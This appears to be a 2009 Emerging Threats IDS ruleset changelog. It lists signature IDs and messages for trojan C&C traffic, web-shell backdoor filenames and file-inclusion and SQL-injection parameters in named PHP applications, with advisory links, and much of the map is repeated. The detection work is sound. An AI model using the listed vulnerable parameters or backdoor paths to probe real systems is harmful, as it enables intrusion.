2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)

[///] Modified inactive rules: [///]

2001716 - ET WEB_SPECIFIC IDN url seen.. (emerging-web_sql_injection.rules)

[---] Disabled rules: [---]

2009130 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Request (emerging-virus.rules)
2009131 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Response (emerging-virus.rules)

[---] Removed rules: [---]

2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules)
2002792 - ET TROJAN Win32.Agent Reporting User Activity (emerging-virus.rules)
2002920 - ET POLICY VNC Authentication Failure (emerging-exploit.rules)
2002922 - ET POLICY VNC Authentication Successful (emerging-exploit.rules)
2003642 - ET TROJAN Downloader.Affill User Agent Detected (lol) (emerging-virus.rules)
2008505 - ET MALWARE Adaware.BarACE Checkin and Update (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-drop-BLOCK.rules (2):
# VERSION 1541
# Generated 2009-05-16 00:03:02 EDT

-> Added to emerging-drop.rules (2):
# VERSION 1541
# Generated 2009-05-16 00:03:02 EDT

-> Added to emerging-exploit.rules (2):
#This is a good auth back from the server, in 2002922 in the policy ruleset
#this is for a server saying auth failed, in 2002920 in the policy ruleset

-> Added to emerging-policy.rules (1):
#part of the state machine sigs in EXPLOIT/RealVNC

-> Added to emerging-sid-msg.map (64):
Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950 2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142 2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189 2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1 2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379 2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973 2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126 2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094 2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || 
bugtraq,34200 2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332 2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686 2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194 2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor 
Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004 2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115 2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/ 2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938 2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287 2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || bugtraq,23934 || url,milw0rm.com/exploits/8208 2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112 2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html 2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009345 2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346 2009347 || ET TROJAN Tigger.a/Syzor Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Tigger || url,doc.emergingthreats.net/2009347 2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Worldpay || url,doc.emergingthreats.net/2009348 || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/ 2009349 || ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349 2009350 || ET TROJAN Win32.Hupigon Control Server Response || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Hupington || url,doc.emergingthreats.net/2009350 2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td -> Added to emerging-sid-msg.map.txt (64): 2001621 || ET WEB Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953 2001716 || ET WEB_SPECIFIC IDN url seen.. 
|| url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716 2001810 || ET WEB Explit PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810 2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html 2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509 2003520 || ET WEB EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957 2007611 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611 2007612 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612 2007613 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613 2007614 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614 2007950 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in 
Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950 2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142 2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189 2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1 2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379 2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973 2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126 2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094 2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195 2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || 
bugtraq,34200 2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332 2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686 2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649 2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194 2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621 2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor 
Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004 2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933 2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064 2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115 2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || 
url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/ 2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938 2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287 2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/ 2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || bugtraq,23934 || 